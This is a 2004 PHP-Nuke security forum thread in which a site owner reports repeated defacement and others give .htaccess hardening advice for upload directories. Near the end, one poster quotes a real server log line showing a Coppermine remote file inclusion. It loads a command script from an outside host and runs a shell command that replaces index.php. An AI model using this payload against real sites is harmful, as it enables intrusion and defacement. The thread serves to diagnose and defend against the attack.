You are missing our premiere tool bar navigation system! Register and use it for FREE!


Author: madmanPostPosted: Tue Jun 01, 2004 6:00 pm    Post subject: Re: [Site hacked] index.php was being replaced/edited

NukeCops  
•  Home •  Downloads •  Gallery •  Your Account •  Forums • 

Author: madmanPostPosted: Tue Jun 01, 2004 5:30 pm    Post subject: Re: [Site hacked] index.php was being replaced/edited

If you are using modules/addons which has file upload feature, that could be the cause. Some XSS methods can also do the trick which let your server creating a file then rename it as php extension.

The solution; update any modules/addons/scripts that allow your visitors to upload a file to your site. If your server running under Linux (or some *nix system that support ext2/ext3 file system), and you have access to the server shell, you can use chattr shell command to change PHP-Nuke file attributes.

Author: ring_cPostPosted: Tue Jun 01, 2004 5:42 pm    Post subject: Re: [Site hacked] index.php was being replaced/edited

Readme First
- Readme First! -

Read and follow the rules, otherwise your posts will be closed
Modules
· Home
· FAQ
· Buy a Theme
· Advertising
· AvantGo
· Bookmarks
· Columbia
· Community
· Donations
· Downloads
· Feedback
· Forums
· PHP-Nuke HOWTO
· Private Messages
· Search
· Statistics
· Stories Archive
· Submit News
· Surveys
· Theme Gallery
· Top
· Topics
· Your Account
Who's Online
There are currently, 303 guest(s) and 0 member(s) that are online.

You are Anonymous user. You can register for free by clicking here
Nuke Cops :: View topic - [Site hacked] index.php was being replaced/edited [Site hacked] index.php was being replaced/edited
Goto page 1, 2  Next  :| |:
Nuke Cops -> Nuke Security

Author: ring_c PostPosted: Tue Jun 01, 2004 5:14 pm    Post subject: [Site hacked] index.php was being replaced/edited

for the last 24 hours, my site was hacked twice with the same method.
Somehow, someone manage to alter/replace my index.php.

Today they left an index.php with these: "Rebellious Fingers - rebellious@end-war.com"

I'm using phpnuke v6.7.
Is this a known issue?
Is there a solution?

I also have Fortress running, and it didn't seem to bother them, nor did I get an email from it.

Any help will do. please!
madman wrote:
If you are using modules/addons which has file upload feature, that could be the cause. Some XSS methods can also do the trick which let your server creating a file then rename it as php extension.

I have the attach_mod in my phpbb. could that be the problem?
Otherwise, I have the "upload files" in my admin panel too. I'll remove this one, as I'm not using it anyway...

madman wrote:
If your server running under Linux (or some *nix system that support ext2/ext3 file system), and you have access to the server shell, you can use chattr shell command to change PHP-Nuke file attributes.

Now, this is a Chinese for me... Sad
ring_c wrote:
I have the attach_mod in my phpbb. could that be the problem?


Try updating to attach mod 2.3.9 and enable scripting code about security in download.php (part of attach mod file). In addition, you can put .htaccess file (if your server running Apache, with full override to mod_access and mod_rewrite) into attach mod upload directory (default is "/files/"). Here the content of .htaccess file:

Code:
<Files .htaccess>
  Order Allow,Deny
  Deny from all
</Files>

<FilesMatch "\.(p?html?|inc|php.?|pl|js|cgi|asp|conf)$">
  Order Allow,Deny
  Deny from all
</FilesMatch>

RewriteEngine on
RewriteCond %{HTTP_REFERER} !^http://(www\.)?YOURDOMAIN.FOO.BAR/.*$ [NC]
RewriteRule .*$ - [F]


Replace YOURDOMAIN.FOO.BAR above with your actual domain (you don't have to supply www prefix).

ring_c wrote:
Otherwise, I have the "upload files" in my admin panel too. I'll remove this one, as I'm not using it anyway...


Good idea.

ring_c wrote:
Now, this is a Chinese for me... Sad


Question Rolling Eyes

Author: ring_c PostPosted: Tue Jun 01, 2004 6:11 pm    Post subject: Re: [Site hacked] index.php was being replaced/edited

madman wrote:
Try updating to attach mod 2.3.9 and enable scripting code about security in download.php (part of attach mod file).


I am using 2.3.9.
I couldn't quite understand the second part of your sentence. where do I enable scripting code? also couldn't find any download.php under attach_mod.

madman wrote:
In addition, you can put .htaccess file

Thanks. done that.

Author: madman PostPosted: Tue Jun 01, 2004 6:29 pm    Post subject: Re: [Site hacked] index.php was being replaced/edited

ring_c wrote:
I couldn't quite understand the second part of your sentence. where do I enable scripting code? also couldn't find any download.php under attach_mod.


If you running stand-alone phpbb, download.php is in your phpbb root directory. If you running bb2nuke ported mod (PHP-Nuke standard forum module), it located in modules/Forums/ directory. By default, security script codes are commented in this file. Read further on comments at this download.php file.

ring_c wrote:
Thanks. done that.


Cool

Author: zanis PostPosted: Wed Jun 02, 2004 12:42 am    Post subject: Re: [Site hacked] index.php was being replaced/edited

madman wrote:
In addition, you can put .htaccess file (if your server running Apache, with full override to mod_access and mod_rewrite) into attach mod upload directory (default is "/files/"). Here the content of .htaccess file:

Code:
<Files .htaccess>
  Order Allow,Deny
  Deny from all
</Files>

<FilesMatch "\.(p?html?|inc|php.?|pl|js|cgi|asp|conf)$">
  Order Allow,Deny
  Deny from all
</FilesMatch>

RewriteEngine on
RewriteCond %{HTTP_REFERER} !^http://(www\.)?YOURDOMAIN.FOO.BAR/.*$ [NC]
RewriteRule .*$ - [F]


Replace YOURDOMAIN.FOO.BAR above with your actual domain (you don't have to supply www prefix).



Hello madman!

I was wondering if you could help me by explaining how this works and is it required if you allow your members to upload their own avatars for the forum?

Cheers

Zanis

Author: madman PostPosted: Wed Jun 02, 2004 8:02 am    Post subject: Re: [Site hacked] index.php was being replaced/edited

zanis wrote:
I was wondering if you could help me by explaining how this works


that .htaccess file is the last chance to prevent someone uploading files and execute them. We take a look all those modifiers one by one:

Code:
<Files .htaccess>
  Order Allow,Deny
  Deny from all
</Files>


This is to protect .htaccess file itself. Usually .htaccess must be stored with 644 CHMOD attributes, but sometimes we forgot to do so, then this identifier will ensure .htaccess file cannot be altered by any way from outside (however, it still alterable from ftp or other server-side file management).

Code:
<FilesMatch "\.(p?html?|inc|php.?|pl|js|cgi|asp|conf)$">
  Order Allow,Deny
  Deny from all
</FilesMatch>


This identifier will prevent some uploadable files executed from outside. In the declaration above, I restrict .htm, .html, phtml, .phtm, .inc, .php, .php3, .php4, .pl, .js, .cgi, .asp, and .conf to be executed (if they exists). If someone can passing such files from file upload checking in script, they still won't execute them due of server/apache restriction.

Code:
RewriteEngine on
RewriteCond %{HTTP_REFERER} !^http://(www\.)?YOURDOMAIN.FOO.BAR/.*$ [NC]
RewriteRule .*$ - [F]


This is prevent hotlinking. This ensure all files stored in upload directory must be processed from inside your domain. Please note the originate request is taken from referer header. This mean, people using firewall/proxy which stripping referral header will got the same restriction.

Quote:
is it required if you allow your members to upload their own avatars for the forum?


You can put that .htaccess in avatar upload directory as well. Be sure there's no subdirs containing your scripting files below the upload directory. But for security reason (as what this forum is for), in my opinion do not let users to upload their avatar to your site. Provide only local/pre-existing avatars or let them using remote avatar (but still keeping to check their extension and valid image checking, however this is already done in phpbb).

Sorry if this is sounds too complicated. I can't explain it in simple words maybe because we talk about technical topic. Perhaps someone can explain this better than mine. Smile But honestly, playing with .htaccess isn't ever simple. This is a Swiss Army's knife of Apache, similar to Regedit in Windows. You do this in wrong way, you'll screw entire system.

Author: Stephen2417Location: Bristolville, OH (US) PostPosted: Wed Jun 02, 2004 9:01 am    Post subject:

Alright I said I was leaving once but I just cant sit here and watch you guys guess..

Plain and simple its coppermine.

Author: burnwaveLocation: Maryland, USA PostPosted: Wed Jun 02, 2004 9:33 am    Post subject: Re: [Site hacked] index.php was being replaced/edited

Where is his coppermine module on his site? All I am seeing is 4nAlbum. Does that module have public upload features? If so, that could be the case.

Author: SaraHol PostPosted: Thu Jun 03, 2004 8:15 am    Post subject:

That's a great post Madman. I certainly learned some stuff from it. Thanks.

Author: thewizardLocation: Germany PostPosted: Thu Jun 03, 2004 12:10 pm    Post subject: Re: [Site hacked] index.php was being replaced/edited

well havent been here for a long time too. Wink.

so look thats they way its done. the vulnerable part is coppermine.
got the guy and one of his dsl ips from brazil.

200.96.250.204 - - [01/Jun/2004:20:30:53 +0200] "GET /modules/coppermine/themes/default/theme.php?THEME_DIR=http://magnific.webcindario.com/cmd.txt?&cmd=cd%20/here the string for your home directory/;mv%20you.txt%20index.php HTTP/1.1"

well maybe someone can have a closer look at this cmd.txt mentioned in the string. if its been deleted meanwhile, i took a copy Rolling Eyes so just pm me if someone wants it


Last edited by thewizard on Thu Jun 03, 2004 12:24 pm; edited 1 time in total

Author: Stephen2417Location: Bristolville, OH (US) PostPosted: Thu Jun 03, 2004 12:22 pm    Post subject:

Great thanks for posting how to hack a site with coppermine... suggest you remove that.

Author: thewizardLocation: Germany PostPosted: Thu Jun 03, 2004 12:27 pm    Post subject: Re: [Site hacked] index.php was being replaced/edited

no matter.
Exclamation Exclamation think its better the guys out there disable their coppermine, until its secured. seems its only ONE way to hack the module

Author: Stephen2417Location: Bristolville, OH (US) PostPosted: Thu Jun 03, 2004 12:33 pm    Post subject:

Well if your directly accessing the file i dont think that would matter you know..

All you have to do is get hte latest version and your done.



Nuke Cops -> Nuke Security

All times are GMT - 8 Hours

Goto page 1, 2  Next  :| |:
Page 1 of 2

Powered by phpBB © 2001,2002 phpBB Group
Powered by TOGETHER TEAM srl ITALY http://www.togetherteam.it - DONDELEO E-COMMERCE http://www.DonDeLeo.com - TUTTISU E-COMMERCE http://www.tuttisu.it
Web site engine's code is Copyright © 2002 by PHP-Nuke. All Rights Reserved. PHP-Nuke is Free Software released under the GNU/GPL license.
Page Generation: 0.064 Seconds - 367 pages served in past 5 minutes. Nuke Cops Founded by Paul Laudanski (Zhen-Xjell)
added by Evaders - DO NOT REMOVE
:: FI Theme :: PHP-Nuke theme by coldblooded (www.nukemods.com) ::